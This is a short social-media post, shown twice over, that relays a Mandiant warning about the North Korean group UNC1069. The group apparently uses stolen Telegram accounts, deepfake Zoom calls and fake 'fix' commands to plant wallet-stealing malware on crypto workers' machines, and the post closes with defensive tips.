mandiant
59 views
2 Discussing
Hot
Latest
⚡️ Google (Mandiant) issues alert: North Korean hackers leveraging AI and deepfake targeting crypto assets
The Mandiant team under Google Cloud has discovered that the threat organization UNC1069 is launching large-scale attacks, directly targeting crypto projects, developers, and venture capital firms. Since the end of 2025, their attack methods have been fully upgraded due to the incorporation of artificial intelligence technology.
"ClickFix" scam pattern analysis:
Social engineering: Hackers use stolen real Telegram accounts to contact you. AI face-swapping meetings: Inviting you to join a Zoom meeting. You will see a real-time video of an AI-generated "partner" (deepfake), which is highly deceptive. Setting traps: The other party claims "network connection failure" and requests you to execute specific "debugging" commands or download a certain "fix patch". Implanting malware: Once clicked, it will trigger malware (such as SILENCELIFT, DEEPBREATH, etc.), aimed at stealing private keys and wallet access.
How to protect your asset security?
Do not trust videos: Even if familiar faces are in the video call, remain highly vigilant whenever software installation or terminal commands are involved. Verify links: Hackers often use fake Zoom or Telegram phishing pages. Cold storage: Store major assets in a hardware wallet isolated from your work computer. Strictly prohibit executing unknown commands: Never copy and run any scripts or codes from chat groups in the console.
Guard your mnemonic phrase and give AI scammers no chance! 🛡🦾
#网络安全 #Mandiant #GoogleCloud #加密安全 #朝鲜黑客
The Mandiant team under Google Cloud has discovered that the threat organization UNC1069 is launching large-scale attacks, directly targeting crypto projects, developers, and venture capital firms. Since the end of 2025, their attack methods have been fully upgraded due to the incorporation of artificial intelligence technology.
"ClickFix" scam pattern analysis:
Social engineering: Hackers use stolen real Telegram accounts to contact you. AI face-swapping meetings: Inviting you to join a Zoom meeting. You will see a real-time video of an AI-generated "partner" (deepfake), which is highly deceptive. Setting traps: The other party claims "network connection failure" and requests you to execute specific "debugging" commands or download a certain "fix patch". Implanting malware: Once clicked, it will trigger malware (such as SILENCELIFT, DEEPBREATH, etc.), aimed at stealing private keys and wallet access.
How to protect your asset security?
Do not trust videos: Even if familiar faces are in the video call, remain highly vigilant whenever software installation or terminal commands are involved. Verify links: Hackers often use fake Zoom or Telegram phishing pages. Cold storage: Store major assets in a hardware wallet isolated from your work computer. Strictly prohibit executing unknown commands: Never copy and run any scripts or codes from chat groups in the console.
Guard your mnemonic phrase and give AI scammers no chance! 🛡🦾
#网络安全 #Mandiant #GoogleCloud #加密安全 #朝鲜黑客
Login to explore more contents